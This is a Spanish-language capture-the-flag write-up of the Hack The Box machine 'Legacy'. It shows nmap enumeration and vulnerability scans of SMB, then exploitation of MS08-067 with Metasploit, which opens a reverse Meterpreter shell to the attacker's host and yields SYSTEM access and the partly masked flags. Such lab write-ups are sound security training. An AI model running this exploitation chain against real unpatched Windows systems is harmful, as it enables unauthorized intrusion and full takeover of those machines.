[HTB] Legacy

Hoy vamos a hackear la maquina de HTB llamada Legacy. Esta catalogada como facil.

Enumeration



sml@m0nikE:~/ctf/htb/machines/legacy$ sudo nmap -A -p- -sS 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 16:59 CET
Nmap scan report for 10.10.10.4
Host is up (0.038s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General 
Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 
cpe:/o:microsoft:windows_server_2003::sp1 
cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 
cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 
2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 
2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), 
Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), 
Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows XP 
SP2 (89%), Microsoft Windows Server 2003 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, 
cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m34s, deviation: 1h24m50s, median: 4d23h57m34s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 
00:50:56:b9:5d:9b (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-11-29T19:58:39+02:00
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   38.38 ms 10.10.14.1
2   38.46 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.95 seconds
Vemos que tiene el puerto 445 abierto asi que vamos a ver si tiene alguna vulnerabilidad usando los scripts de nmap smb-vuln*

sml@m0nikE:~$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:02 CET
Nmap scan report for 10.10.10.4
Host is up (0.038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, 
Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote 
attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during 
path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannac
rypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds
Podemos ver que tiene vulnerabilidades... Para este caso vamos a usar MS08-067.

Exploitation



msf5 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  
Description
   -  ----                                 ---------------  ----   -----  
-----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    
MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 
2019-11-24 17:03:37 +0100
Ha funcionado, con lo cual ya tenemos una sesion abierta. Comprobamos nuestros privilegios en la maquina.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Somos SYSTEM, asi que tenemos un usuario con privilegios. Hora de conseguir los flags.

user.txt



C:\>cd documents and settings
cd documents and settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

29/11/2019  08:02                .
29/11/2019  08:02                ..
29/11/2019  08:02                  0 10.10.10.4
16/03/2017  08:07                Administrator
16/03/2017  07:29                All Users
29/11/2019  08:02                  0 exploit
16/03/2017  07:33                john
29/11/2019  08:01                  0 search
29/11/2019  08:02                  0 set
29/11/2019  08:01                  0 show
29/11/2019  08:01                  0 use
               6 File(s)              0 bytes
               5 Dir(s)   6.313.308.160 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  08:19                .
16/03/2017  08:19                ..
16/03/2017  08:19                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.313.304.064 bytes free

C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4f443de7e36876fda4ec76XXX

root.txt



C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  08:07                .
16/03/2017  08:07                ..
16/03/2017  08:18                Desktop
16/03/2017  08:07                Favorites
16/03/2017  08:07                My Documents
16/03/2017  07:20                Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.313.295.872 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5XXX

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".